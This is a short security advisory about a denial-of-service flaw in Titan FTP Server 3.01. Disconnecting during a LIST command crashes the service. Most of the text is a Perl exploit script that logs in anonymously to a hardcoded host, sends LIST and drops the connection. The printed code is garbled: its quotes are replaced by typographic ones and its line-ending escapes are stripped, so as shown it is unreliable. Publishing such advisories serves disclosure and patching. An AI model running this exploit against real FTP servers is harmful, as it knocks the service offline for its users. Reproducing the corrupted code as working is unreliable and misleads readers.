‘Titan FTP Server Aborted LIST DoS’
Summary
‘A security vulnerability exists in South River Technologies’ Titan FTP Server, a user issuing a LIST command and disconnecting before the LIST command had the time to connect, will cause the program to try and access an invalid socket. This will result in the FTP service’s crash (and in turn, no longer being able to service any additional users).’
Credit:
‘SecurITeam would like to thank STORM for finding this vulnerability.’
Details
‘Vulnerable Systems:
* Titan FTP Server version 3.01 build 163
Immune Systems:
* Titan FTP Server version 3.10 build 169
Solution:
To solve this issue upgrade to the latest version (3.10 build 169 or newer).
Exploit:
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
#
use IO::Socket;
$host = ‘192.168.1.243’;
my @combination;
$combination[0] = ‘LIST rn’;
for (my $i = 0; $combination[$i] ; $i++)
{
print ‘Combination: $1n’;
$remote = IO::Socket::INET->new ( Proto => ‘tcp’,
PeerAddr => $host,
PeerPort => ‘2112’,
);
unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }
print ‘connectedn’;
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = ‘USER anonymousrn’;
print $remote $ftp;
print $ftp;
while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}
$ftp = ‘PASS a@b.comrn’;
print $remote $ftp;
print $ftp;
while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}
$ftp = $combination[$i];
print $remote $ftp;
print $ftp;
while (<$remote>)
{
print $_;
if (/150 /)
{
last;
}
close $remote;
}’